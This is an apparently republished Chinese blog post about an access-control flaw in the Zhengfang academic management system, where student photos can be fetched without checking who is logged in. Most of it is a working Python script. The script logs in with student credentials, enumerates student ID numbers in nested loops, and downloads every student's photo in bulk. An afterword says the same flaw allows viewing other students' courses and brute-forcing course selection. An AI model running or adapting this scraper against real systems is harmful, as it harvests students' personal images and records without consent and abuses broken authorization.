【正方教務管理系統】HACK日誌（二）

時間 2019-11-06

標籤正方教務管理系統 hack 日誌简体版

原文原文鏈接

正方系統的一個漏洞是獲取學生圖片時沒有對學生身份進行檢測。理論上來講，獲取學生李四的照片，須要首先判斷登錄者身份是教師或者學生，若是是學生還要判斷登錄者是否爲李四本人，而正方系統在這一方面並無作得很好，致使張三能夠輕鬆地獲取李四的照片。 html

下面是筆者編寫的一個簡單的爬蟲程序，Python 代碼以下（Python 3.2）， python

import http.client
import urllib
import os

_xh = '**********'
_pw = '**********'
VIEWSTATE = 'dDwtMTIwMTU3OTE3Nzs7PpxRSEGelcLnTaPgA3v56uoKweD+'
host = 'jwc.****.edu.cn:8989'
main_url = 'http://' + host
login_page = '/default2.aspx'
login_url = main_url + login_page
readimage_page = '/readimagexs.aspx'
print(main_url)
print(login_url)


conn = http.client.HTTPConnection(host)
login_post_data = urllib.parse.urlencode({
    '__VIEWSTATE': VIEWSTATE,
    'TextBox1': _xh,
    'TextBox2': _pw,
    'RadioButtonList1': '學生',
    'Button1': '',
    'lbLanguage': ''
})
login_post_data = login_post_data.encode('utf-8')
login_headers = {
    'Host': host,
    'Connection': 'keep-alive',
    'Origin':	main_url,
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Referer': main_url,
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3'
}

conn.request('POST', login_page, body = login_post_data, headers = login_headers)
result = conn.getresponse()
print(result.status)
#print(result.read())
cookie = result.msg['set-cookie'].split(';')[0]
#print(cookie)
conn.close()

readimage_headers = {
    'Host': host,
    'Connection': 'keep-alive',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3',
    'Cookie': cookie
}

conn.request('GET', '/xs_main.aspx' + '?' + 'xh=' + _xh, headers = readimage_headers)
#result = conn.getresponse()
#print(result.status)
#print(result.read())
conn.close()

for year in range(1, 12):#11
    for college in range(1, 20):#19
        for major in range(1, 15):#14
            for mclass in range(1, 10):
                for series in range(1, 50):
                    image_xh = "%02d%02d%02d%02d%02d" % (year, college, major, mclass, series)
                    readimage_url = readimage_page + '?' + 'xh=' + image_xh
                    print(readimage_url)
                    conn.request('GET', readimage_url, headers = readimage_headers)
                    result = conn.getresponse()
                    #print(result.status)
                    image = result.read()
                    if len(image) > 1024:
                        save_path = os.path.join(os.path.abspath('./pic/'), image_xh + '.bmp')
                        print(save_path)
                        fp = open(save_path, 'wb')
                        fp.write(image)
                        fp.close()
                    else:
                        print('skip')
print('done')
conn.close()

後記：正方的選課模塊依然有這樣的漏洞，所以理論上來講，偷窺別人的課程、暴力選課也照樣能夠實現。 cookie

2012-07-01
By whypro app